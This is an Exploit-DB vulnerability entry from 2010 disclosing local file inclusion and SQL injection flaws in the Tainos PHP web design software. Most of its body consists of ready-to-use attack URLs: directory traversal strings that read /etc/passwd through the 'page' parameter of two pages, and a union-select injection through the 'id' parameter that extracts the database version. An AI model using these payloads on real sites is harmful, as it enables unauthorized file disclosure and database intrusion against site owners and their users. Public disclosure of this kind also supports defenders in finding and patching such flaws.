Tainos Multiple Vulnerabilities

2010-05-16T00:00:00
ID EDB-ID:12629
Type exploitdb
Reporter XroGuE
Modified 2010-05-16T00:00:00

Description

Tainos Multiple Vulnerabilities. Webapps exploit for php platform

                                        
                                            =======================================================
Tainos Multiple Vulnerabilities
=======================================================
########################################
# Name: Tainos Multiple Vulnerabilities
# Vendor: www.tainos-webdesign.com
# Date: 2010/05/16
# Author: Ashiyane Digital Security Team
# Discovered: XroGuE
# Thanks to: Virangar,Ali.Eagle,Satanic2000,Ashiyane Members
# Contact: Xrogue_p3rsi4n_hack3r@Hotmail.com
########################################

########################################
[+] Local File Include Vulnerability:

[+] Vulnerability: www.Site.com/[path]/Page.php?page=[LFI]

[+] Example: http://[site]/index_offer.php?page=../../../../../../../../../../etc/passwd

[+] Example: http://[site]/nederlands/tours.php?page=../../../../../../../../../../etc/passwd

########################################

########################################
[+] SQL Injection Vulnerability:

[+] Vulnerability: /www.site.com/index.php?id=[SQLi]

[+] Example: http://[site]/index.php?id=-9999+union+all+select+1,2,@@version,4,5

########################################